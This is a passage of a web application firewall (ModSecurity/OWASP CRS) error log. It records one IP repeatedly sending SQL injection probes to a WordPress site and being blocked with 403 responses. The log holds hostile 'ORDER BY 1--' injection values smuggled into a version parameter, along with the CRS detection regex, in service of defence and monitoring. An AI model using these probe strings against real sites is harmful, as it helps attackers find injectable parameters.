"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16) ORDER BY 1-- ivgM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFl1xchXPGtOGw21Gp6gAAAIY"] [Wed Jun 26 16:18:16.188603 2024] [:error] [pid 31245:tid 140055226038016] [client 141.98.81.52:34284] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmK57xDCgKzJ-zxAxjQAAAFM"] [Wed Jun 26 16:18:16.432751 2024] [:error] [pid 31859:tid 140055318357760] [client 141.98.81.52:34286] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmIxkekPtrPbqLNY4UQAAAMg"] [Wed Jun 26 16:18:16.683918 2024] [:error] [pid 31859:tid 140055407634176] [client 141.98.81.52:34288] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmIxkekPtrPbqLNY4UgAAAMY"] [Wed Jun 26 16:18:16.935244 2024] [:error] [pid 31859:tid 140055192467200] [client 141.98.81.52:34290] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmIxkekPtrPbqLNY4UwAAANc"] [Wed Jun 26 16:18:17.196190 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34292] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmYxkekPtrPbqLNY4VAAAAMU"] [Wed Jun 26 16:18:17.460614 2024] [:error] [pid 31246:tid 140055416026880] [client 141.98.81.52:34294] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmVxchXPGtOGw21Gp6wAAAIU"] [Wed Jun 26 16:18:17.700471 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34296] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmYxkekPtrPbqLNY4VQAAANY"] [Wed Jun 26 16:18:17.962890 2024] [:error] [pid 31245:tid 140055457990400] [client 141.98.81.52:34298] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFma57xDCgKzJ-zxAxjgAAAEA"] [Wed Jun 26 16:18:18.211253 2024] [:error] [pid 31245:tid 140055407634176] [client 141.98.81.52:34300] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmq57xDCgKzJ-zxAxjwAAAEY"] [Wed Jun 26 16:18:18.461214 2024] [:error] [pid 31244:tid 140055217645312] [client 141.98.81.52:34302] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmubXXCyFmkhe1iNqSgAAABQ"] [Wed Jun 26 16:18:18.700468 2024] [:error] [pid 31244:tid 140055309965056] [client 141.98.81.52:34304] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16 ORDER BY 1-- zHfE"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFmubXXCyFmkhe1iNqSwAAAAk"] [Wed Jun 26 16:18:19.171514 2024] [:error] [pid 31244:tid 140055184074496] [client 141.98.81.52:34306] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFm-bXXCyFmkhe1iNqTAAAABg"] [Wed Jun 26 16:18:19.423940 2024] [:error] [pid 31244:tid 140055200859904] [client 141.98.81.52:34308] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFm-bXXCyFmkhe1iNqTQAAABY"] [Wed Jun 26 16:18:19.678400 2024] [:error] [pid 31859:tid 140055424419584] [client 141.98.81.52:34310] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFm4xkekPtrPbqLNY4VgAAAMQ"] [Wed Jun 26 16:18:19.931946 2024] [:error] [pid 31859:tid 140055284786944] [client 141.98.81.52:34312] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFm4xkekPtrPbqLNY4VwAAAMw"] [Wed Jun 26 16:18:20.179936 2024] [:error] [pid 31246:tid 140055209252608] [client 141.98.81.52:34314] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnFxchXPGtOGw21Gp7AAAAJU"] [Wed Jun 26 16:18:20.422213 2024] [:error] [pid 31246:tid 140055242823424] [client 141.98.81.52:34316] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnFxchXPGtOGw21Gp7QAAAJE"] [Wed Jun 26 16:18:20.671139 2024] [:error] [pid 31246:tid 140055432812288] [client 141.98.81.52:34318] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnFxchXPGtOGw21Gp7gAAAIM"] [Wed Jun 26 16:18:20.920803 2024] [:error] [pid 31246:tid 140055457990400] [client 141.98.81.52:34320] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnFxchXPGtOGw21Gp7wAAAIA"] [Wed Jun 26 16:18:21.382387 2024] [:error] [pid 31246:tid 140055276394240] [client 141.98.81.52:34322] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnVxchXPGtOGw21Gp8AAAAI0"] [Wed Jun 26 16:18:21.633689 2024] [:error] [pid 31246:tid 140055441204992] [client 141.98.81.52:34324] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnVxchXPGtOGw21Gp8QAAAII"] [Wed Jun 26 16:18:21.878332 2024] [:error] [pid 31246:tid 140055226038016] [client 141.98.81.52:34326] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16') ORDER BY 1-- zPrw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnVxchXPGtOGw21Gp8gAAAJM"] [Wed Jun 26 16:18:22.130655 2024] [:error] [pid 31246:tid 140055217645312] [client 141.98.81.52:34328] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnlxchXPGtOGw21Gp8wAAAJQ"] [Wed Jun 26 16:18:22.382802 2024] [:error] [pid 31859:tid 140055326750464] [client 141.98.81.52:34330] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnoxkekPtrPbqLNY4WAAAAMc"] [Wed Jun 26 16:18:22.620051 2024] [:error] [pid 31246:tid 140055259608832] [client 141.98.81.52:34332] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnlxchXPGtOGw21Gp9AAAAI8"] [Wed Jun 26 16:18:22.860624 2024] [:error] [pid 31246:tid 140055424419584] [client 141.98.81.52:34334] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFnlxchXPGtOGw21Gp9QAAAIQ"] [Wed Jun 26 16:18:23.114807 2024] [:error] [pid 31859:tid 140055276394240] [client 141.98.81.52:34336] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFn4xkekPtrPbqLNY4WQAAAM0"] [Wed Jun 26 16:18:23.362429 2024] [:error] [pid 31859:tid 140055268001536] [client 141.98.81.52:34338] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFn4xkekPtrPbqLNY4WgAAAM4"] [Wed Jun 26 16:18:23.613699 2024] [:error] [pid 31859:tid 140055432812288] [client 141.98.81.52:34340] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFn4xkekPtrPbqLNY4WwAAAMM"] [Wed Jun 26 16:18:23.862066 2024] [:error] [pid 31859:tid 140055184074496] [client 141.98.81.52:34342] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL 